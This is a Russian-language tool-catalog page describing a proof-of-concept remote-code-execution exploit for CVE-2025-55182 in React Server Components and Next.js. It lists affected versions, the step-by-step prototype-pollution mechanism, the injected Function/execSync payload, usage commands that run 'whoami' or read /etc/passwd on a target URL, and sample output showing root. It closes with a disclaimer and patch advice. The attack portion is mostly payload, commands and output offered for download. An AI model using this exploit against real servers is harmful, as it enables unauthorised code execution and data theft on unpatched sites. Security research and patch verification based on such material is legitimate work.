Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182_PoC — Proof-of-Concept RCE для CVE‑2025‑55182, эксплуатирующий протокол React Flight в Next.js App Router. | Kitploit
Инструменты/GitHubGitHub/rl0x01/cve-2025-55182_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Proof-of-Concept RCE для CVE‑2025‑55182, эксплуатирующий протокол React Flight в Next.js App Router.

Репозиторий
129 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 - React Server Components RCE PoC

Автор: rl0x01

Описание

CVE-2025-55182 — это критическая (CVSS 10.0) уязвимость удаленного выполнения кода (RCE), затрагивающая React Server Components через протокол Flight.

Уязвимые версии

Next.jsReact
14.3.0-canary.77 to 15.0.419.0.0
15.1.1-canary.0 to 15.1.819.1.0
15.2.0-canary.0 to 15.2.519.1.1
15.3.0-canary.0 to 15.3.519.2.0
15.4.0-canary.0 to 15.4.7
15.5.1-canary.0 to 15.5.6
16.0.0-canary.0 to 16.0.6

Исправленные версии

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Механизм эксплуатации

  1. Использует $@ для получения ссылки на необработанный Chunk
  2. Перезаписывает .then через Chunk.prototype.then с помощью $1:__proto__:then
  3. Устанавливает status в resolved_model для запуска initializeModelChunk
  4. Использует $B1337 для запуска десериализации Blob
  5. Указывает _formData.get на конструктор Function
  6. _prefix содержит JS-код для выполнения

Код выполняется через:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

Установка

root@kitploit:~
pip install -r requirements.txt

Использование

Проверка, уязвима ли цель

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

Выполнение команды

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Параметры

ПараметрОписание
urlURL целевого ресурса (обязательно)
-c, --commandКоманда для выполнения (по умолчанию: id)
--check-onlyТолько проверка на уязвимость
-t, --timeoutТайм-аут в секундах (по умолчанию: 15)
-v, --verboseПодробный вывод
--rawПоказать необработанный ответ

Уязвимый тестовый стенд

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

Пример вывода

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

Структура проекта

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Отказ от ответственности

⚠️ Этот инструмент предоставляется только в образовательных целях и для авторизованного тестирования безопасности.

Несанкционированное использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.

Меры по устранению

  1. Обновите Next.js до версии 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ или 16.0.7+
  2. Обновите React до исправленной версии
  3. Внедрите правила WAF для блокировки вредоносных payload протокола Flight
Скачать инструмент